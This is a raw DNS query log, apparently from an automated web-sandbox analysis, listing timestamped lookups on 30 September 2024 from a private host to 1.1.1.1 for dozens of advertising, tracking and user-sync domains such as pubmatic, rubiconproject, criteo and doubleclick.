                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.524265051 CEST192.168.2.41.1.1.10x6396Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.524421930 CEST192.168.2.41.1.1.10x507eStandard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.531305075 CEST192.168.2.41.1.1.10xaf55Standard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.531717062 CEST192.168.2.41.1.1.10x593cStandard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.534044027 CEST192.168.2.41.1.1.10xa8d2Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.534193039 CEST192.168.2.41.1.1.10xf146Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.540851116 CEST192.168.2.41.1.1.10x542aStandard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.541009903 CEST192.168.2.41.1.1.10xa803Standard query (0)static.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.544156075 CEST192.168.2.41.1.1.10xd4d0Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.544527054 CEST192.168.2.41.1.1.10x3a1dStandard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.547174931 CEST192.168.2.41.1.1.10x2041Standard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.547564983 CEST192.168.2.41.1.1.10x9364Standard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.549863100 CEST192.168.2.41.1.1.10xe83bStandard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.550316095 CEST192.168.2.41.1.1.10xedc7Standard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.917272091 CEST192.168.2.41.1.1.10x8e58Standard query (0)sync.adkernel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.917526007 CEST192.168.2.41.1.1.10x14d9Standard query (0)sync.adkernel.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.251302958 CEST192.168.2.41.1.1.10x19edStandard query (0)simage2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.251894951 CEST192.168.2.41.1.1.10xd687Standard query (0)simage2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.773566008 CEST192.168.2.41.1.1.10xa771Standard query (0)c1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.773701906 CEST192.168.2.41.1.1.10x27eStandard query (0)c1.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.811520100 CEST192.168.2.41.1.1.10xe621Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.811661005 CEST192.168.2.41.1.1.10xa731Standard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.813344002 CEST192.168.2.41.1.1.10x3ed1Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:26.813473940 CEST192.168.2.41.1.1.10x424aStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.101713896 CEST192.168.2.41.1.1.10x3ad3Standard query (0)sync.targeting.unrulymedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.101850986 CEST192.168.2.41.1.1.10x297dStandard query (0)sync.targeting.unrulymedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.147289991 CEST192.168.2.41.1.1.10x6b5Standard query (0)creativecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.147438049 CEST192.168.2.41.1.1.10xb6c3Standard query (0)creativecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.206442118 CEST192.168.2.41.1.1.10x49c0Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.206589937 CEST192.168.2.41.1.1.10xb1e0Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.470221996 CEST192.168.2.41.1.1.10x7107Standard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.474172115 CEST192.168.2.41.1.1.10x1251Standard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.505645037 CEST192.168.2.41.1.1.10xb9a3Standard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.505788088 CEST192.168.2.41.1.1.10xfc63Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.509638071 CEST192.168.2.41.1.1.10x2f73Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.509877920 CEST192.168.2.41.1.1.10x1fdeStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.719721079 CEST192.168.2.41.1.1.10x13b0Standard query (0)tg.socdm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.719849110 CEST192.168.2.41.1.1.10xb6abStandard query (0)tg.socdm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.911021948 CEST192.168.2.41.1.1.10x62fdStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.911274910 CEST192.168.2.41.1.1.10xff9eStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.088872910 CEST192.168.2.41.1.1.10x9c40Standard query (0)secure-assets.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.089044094 CEST192.168.2.41.1.1.10x462cStandard query (0)secure-assets.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.208005905 CEST192.168.2.41.1.1.10xd32Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.208151102 CEST192.168.2.41.1.1.10xf937Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.258773088 CEST192.168.2.41.1.1.10xfbebStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.258923054 CEST192.168.2.41.1.1.10xaf09Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.261259079 CEST192.168.2.41.1.1.10x9d9Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.261411905 CEST192.168.2.41.1.1.10xec38Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.264734983 CEST192.168.2.41.1.1.10x4ad2Standard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.264880896 CEST192.168.2.41.1.1.10x2779Standard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.377422094 CEST192.168.2.41.1.1.10x5ca5Standard query (0)beacon-ams3.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.377583027 CEST192.168.2.41.1.1.10x5563Standard query (0)beacon-ams3.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.381335020 CEST192.168.2.41.1.1.10xa479Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.381472111 CEST192.168.2.41.1.1.10xd59eStandard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.383917093 CEST192.168.2.41.1.1.10xc377Standard query (0)mwzeom.zeotap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.384116888 CEST192.168.2.41.1.1.10xa146Standard query (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.385644913 CEST192.168.2.41.1.1.10x75d8Standard query (0)um.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.385842085 CEST192.168.2.41.1.1.10x6fc9Standard query (0)um.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.387901068 CEST192.168.2.41.1.1.10x650aStandard query (0)simage4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.388118029 CEST192.168.2.41.1.1.10xc22aStandard query (0)simage4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.508316994 CEST192.168.2.41.1.1.10x7d77Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.508528948 CEST192.168.2.41.1.1.10xfaceStandard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.549566984 CEST192.168.2.41.1.1.10xbe01Standard query (0)sync.ipredictive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.549700022 CEST192.168.2.41.1.1.10xa27Standard query (0)sync.ipredictive.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.550049067 CEST192.168.2.41.1.1.10x6c72Standard query (0)match.deepintent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.550188065 CEST192.168.2.41.1.1.10xa0b9Standard query (0)match.deepintent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.550561905 CEST192.168.2.41.1.1.10x1585Standard query (0)b1sync.zemanta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.550723076 CEST192.168.2.41.1.1.10x97f7Standard query (0)b1sync.zemanta.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.551103115 CEST192.168.2.41.1.1.10xcf27Standard query (0)image4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.551263094 CEST192.168.2.41.1.1.10xe6a5Standard query (0)image4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.646157980 CEST192.168.2.41.1.1.10x7ad1Standard query (0)pixel-sync.sitescout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.646404028 CEST192.168.2.41.1.1.10x92f4Standard query (0)pixel-sync.sitescout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.569094896 CEST192.168.2.41.1.1.10xeb8aStandard query (0)cms.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.569236994 CEST192.168.2.41.1.1.10x75f8Standard query (0)cms.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.573854923 CEST192.168.2.41.1.1.10x7dafStandard query (0)match.prod.bidr.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.573995113 CEST192.168.2.41.1.1.10xbe46Standard query (0)match.prod.bidr.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.603843927 CEST192.168.2.41.1.1.10xc34dStandard query (0)bh.contextweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.603986979 CEST192.168.2.41.1.1.10xcaa8Standard query (0)bh.contextweb.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.756555080 CEST192.168.2.41.1.1.10x2f29Standard query (0)dsp-ap.eskimi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.756671906 CEST192.168.2.41.1.1.10xdbc0Standard query (0)dsp-ap.eskimi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.771004915 CEST192.168.2.41.1.1.10xcb50Standard query (0)p.rfihub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.771132946 CEST192.168.2.41.1.1.10x2e52Standard query (0)p.rfihub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.955056906 CEST192.168.2.41.1.1.10xcb13Standard query (0)csync.loopme.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.955568075 CEST192.168.2.41.1.1.10xcfa5Standard query (0)csync.loopme.me65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.099617958 CEST192.168.2.41.1.1.10x9f93Standard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.099900961 CEST192.168.2.41.1.1.10xef53Standard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.338233948 CEST192.168.2.41.1.1.10x7ba5Standard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.338459969 CEST192.168.2.41.1.1.10x52a1Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.350672960 CEST192.168.2.41.1.1.10xfc6fStandard query (0)live.primis.techA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.350915909 CEST192.168.2.41.1.1.10x5bdStandard query (0)live.primis.tech65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.396864891 CEST192.168.2.41.1.1.10x3f83Standard query (0)t.adx.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.397077084 CEST192.168.2.41.1.1.10xcbb6Standard query (0)t.adx.opera.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.527210951 CEST192.168.2.41.1.1.10xf061Standard query (0)dsp-cookie.adfarm1.adition.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.527355909 CEST192.168.2.41.1.1.10x61d5Standard query (0)dsp-cookie.adfarm1.adition.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.595060110 CEST192.168.2.41.1.1.10x311Standard query (0)pubmatic-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.595343113 CEST192.168.2.41.1.1.10xdb58Standard query (0)pubmatic-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.854428053 CEST192.168.2.41.1.1.10xd47eStandard query (0)ssbsync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.854984045 CEST192.168.2.41.1.1.10x4ae5Standard query (0)ssbsync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.860888004 CEST192.168.2.41.1.1.10x8804Standard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.861165047 CEST192.168.2.41.1.1.10x5a73Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.978526115 CEST192.168.2.41.1.1.10xf303Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.978526115 CEST192.168.2.41.1.1.10x8918Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.979310989 CEST192.168.2.41.1.1.10x773aStandard query (0)ws.rqtrk.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.980565071 CEST192.168.2.41.1.1.10xd655Standard query (0)ws.rqtrk.eu65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.095388889 CEST192.168.2.41.1.1.10xf39fStandard query (0)ce.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.095597982 CEST192.168.2.41.1.1.10xddaStandard query (0)ce.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.144253969 CEST192.168.2.41.1.1.10x863dStandard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.144570112 CEST192.168.2.41.1.1.10x6405Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.233738899 CEST192.168.2.41.1.1.10x677fStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.234754086 CEST192.168.2.41.1.1.10xfc3cStandard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.559530020 CEST192.168.2.41.1.1.10x3cffStandard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.560342073 CEST192.168.2.41.1.1.10xebb4Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.570477962 CEST192.168.2.41.1.1.10x13f9Standard query (0)simage4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.570477962 CEST192.168.2.41.1.1.10x29aStandard query (0)simage4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.571485996 CEST192.168.2.41.1.1.10x9814Standard query (0)match.deepintent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.571809053 CEST192.168.2.41.1.1.10xa74Standard query (0)match.deepintent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.573266029 CEST192.168.2.41.1.1.10x3d95Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.573671103 CEST192.168.2.41.1.1.10x7f4bStandard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.769082069 CEST192.168.2.41.1.1.10x26deStandard query (0)image4.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.769082069 CEST192.168.2.41.1.1.10x3f10Standard query (0)image4.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.772528887 CEST192.168.2.41.1.1.10x812aStandard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.773299932 CEST192.168.2.41.1.1.10xfc95Standard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.916275978 CEST192.168.2.41.1.1.10x6e4Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.916654110 CEST192.168.2.41.1.1.10x9ce9Standard query (0)match.sharethrough.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.074573994 CEST192.168.2.41.1.1.10xffcStandard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.075964928 CEST192.168.2.41.1.1.10x77daStandard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.076901913 CEST192.168.2.41.1.1.10xf871Standard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.077311993 CEST192.168.2.41.1.1.10xb45aStandard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.110492945 CEST192.168.2.41.1.1.10xeaf9Standard query (0)sync.intentiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.110750914 CEST192.168.2.41.1.1.10xf8ddStandard query (0)sync.intentiq.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.448414087 CEST192.168.2.41.1.1.10x4bedStandard query (0)a.sportradarserving.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.448652029 CEST192.168.2.41.1.1.10x25afStandard query (0)a.sportradarserving.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.557943106 CEST192.168.2.41.1.1.10x157Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.558278084 CEST192.168.2.41.1.1.10x4e1cStandard query (0)match.sharethrough.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.780713081 CEST192.168.2.41.1.1.10x1eb9Standard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.780911922 CEST192.168.2.41.1.1.10x34afStandard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.009150028 CEST192.168.2.41.1.1.10xe83eStandard query (0)sync-pm.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.009351969 CEST192.168.2.41.1.1.10x51f4Standard query (0)sync-pm.ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.213679075 CEST192.168.2.41.1.1.10xac67Standard query (0)rtb.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.213898897 CEST192.168.2.41.1.1.10xa08dStandard query (0)rtb.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.269517899 CEST192.168.2.41.1.1.10x29faStandard query (0)triplelift-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.270626068 CEST192.168.2.41.1.1.10x3980Standard query (0)triplelift-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.075474977 CEST192.168.2.41.1.1.10xd070Standard query (0)pm.w55c.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.075627089 CEST192.168.2.41.1.1.10x9872Standard query (0)pm.w55c.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.115782022 CEST192.168.2.41.1.1.10x2cd8Standard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.115983009 CEST192.168.2.41.1.1.10x6666Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.117090940 CEST192.168.2.41.1.1.10xc41bStandard query (0)finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.117249966 CEST192.168.2.41.1.1.10xcf74Standard query (0)finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.027328968 CEST192.168.2.41.1.1.10x2c5eStandard query (0)hbx.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.027487040 CEST192.168.2.41.1.1.10x2a5bStandard query (0)hbx.media.net65IN (0x0001)false
